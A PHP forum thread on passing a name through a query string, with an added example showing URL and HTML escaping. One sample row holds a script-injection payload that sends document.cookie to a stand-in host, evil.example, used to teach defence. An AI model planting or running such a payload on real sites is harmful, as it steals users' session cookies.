December 27th, 2012, 11:00 AM
Help with passing a query string
I want to pass some data using a query string, but have run into a problem.
The line of code is as follows:
<td style="text-align:center; width:5%;"><a href=xxx.php?HouseholdID=<? echo $HouseholdID . '&HouseholdName=' . $HouseholdName; ?> ><img src=pencil.gif border=0></a></td>
The HouseholdName displays correctly in the table column with the full name, i.e. "Smith, John", but when the query string runs only the value "Smith" is returned instead of the full name "Smith, John". Is this because of the comma between the last and first name, and is there a way around this?
December 27th, 2012, 11:24 AM
This is the same problem as last time, when you inserted raw variables into query strings.
You need to urlencode() every variable before you can safely insert it into a URL. Otherwise you'll end up with a complete mess or even a gigantic security hole.
I hope you at least applied htmlentities() to $HouseholdID etc.? If you didn't, people can insert anything into your page and steal your users' cookies, redirect them to a malware site and whatnot.
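The following is an added example, not code from either poster. It rebuilds the edit link from the question two ways: the original way, with raw values and an unquoted href (whitespace ends an unquoted attribute value, which is why "Smith, John" is cut off at the space), and the way the reply describes, with every value URL-encoded via http_build_query() (which calls urlencode() on each value) and the resulting URL escaped again for the HTML attribute context with htmlspecialchars(). The household rows, including the hostile name, are constructed for the demonstration; xxx.php, pencil.gif and the column names are taken from the question.

```php
<?php
// Added example (not from the original thread). Constructed sample rows: one
// ordinary "Last, First" name and one hostile name that tries to break out of
// the attribute and inject script.
$rows = [
    ['HouseholdID' => 42, 'HouseholdName' => 'Smith, John'],
    ['HouseholdID' => 43, 'HouseholdName' => '"><script>location="http://evil.example/?c="+document.cookie</script>'],
];

// The original approach: raw values, unquoted href. The browser ends the
// unquoted attribute at the first space, so HouseholdName arrives as "Smith,"
// and the hostile row injects its own markup into the page.
function editLinkUnsafe(array $row): string
{
    return '<a href=xxx.php?HouseholdID=' . $row['HouseholdID']
        . '&HouseholdName=' . $row['HouseholdName']
        . '><img src=pencil.gif border=0></a>';
}

// The approach the reply recommends: encode once for the URL, once for HTML.
function editLinkSafe(array $row): string
{
    // http_build_query() urlencodes every key and value, so "Smith, John"
    // becomes Smith%2C+John and a name containing "&", "=" or "#" can no
    // longer split or truncate the query string.
    $query = http_build_query([
        'HouseholdID'   => $row['HouseholdID'],
        'HouseholdName' => $row['HouseholdName'],
    ]);
    $url = 'xxx.php?' . $query;

    // The URL is about to land inside an HTML attribute, so escape for that
    // context as well ("&" -> "&amp;", quotes -> entities) and quote the
    // attribute. htmlentities() would do equally well here.
    $href = htmlspecialchars($url, ENT_QUOTES, 'UTF-8');

    return '<a href="' . $href . '"><img src="pencil.gif" border="0" alt="edit"></a>';
}

// What xxx.php receives: PHP decodes the query string into $_GET. parse_str()
// performs the same decoding, which lets us check offline that the full name
// survives the round trip.
function roundTrip(array $row): array
{
    $query = http_build_query($row);
    parse_str($query, $decoded);
    return $decoded;
}

// On the receiving page the values are untrusted input again: escape them
// before echoing them back into HTML, or the reply's cookie-theft scenario
// happens on xxx.php instead of on the table page.
function renderReceivedName(array $get): string
{
    $name = $get['HouseholdName'] ?? '';
    return '<h1>Editing ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . '</h1>';
}

foreach ($rows as $row) {
    echo "Unsafe: " . editLinkUnsafe($row) . "\n";
    echo "Safe:   " . editLinkSafe($row) . "\n";
    $back = roundTrip($row);
    echo "Decoded on xxx.php: " . $back['HouseholdName'] . "\n";
    echo "Rendered on xxx.php: " . renderReceivedName($back) . "\n\n";
}
```

The two escaping steps are deliberately separate because they answer two different parsers: urlencode()/http_build_query() protects the query-string syntax, and htmlspecialchars() protects the HTML attribute the URL sits in. Skipping the second step leaves a literal "&" in the attribute, which browsers tolerate but which is the same category of mistake; skipping the first is what truncated the name in the question.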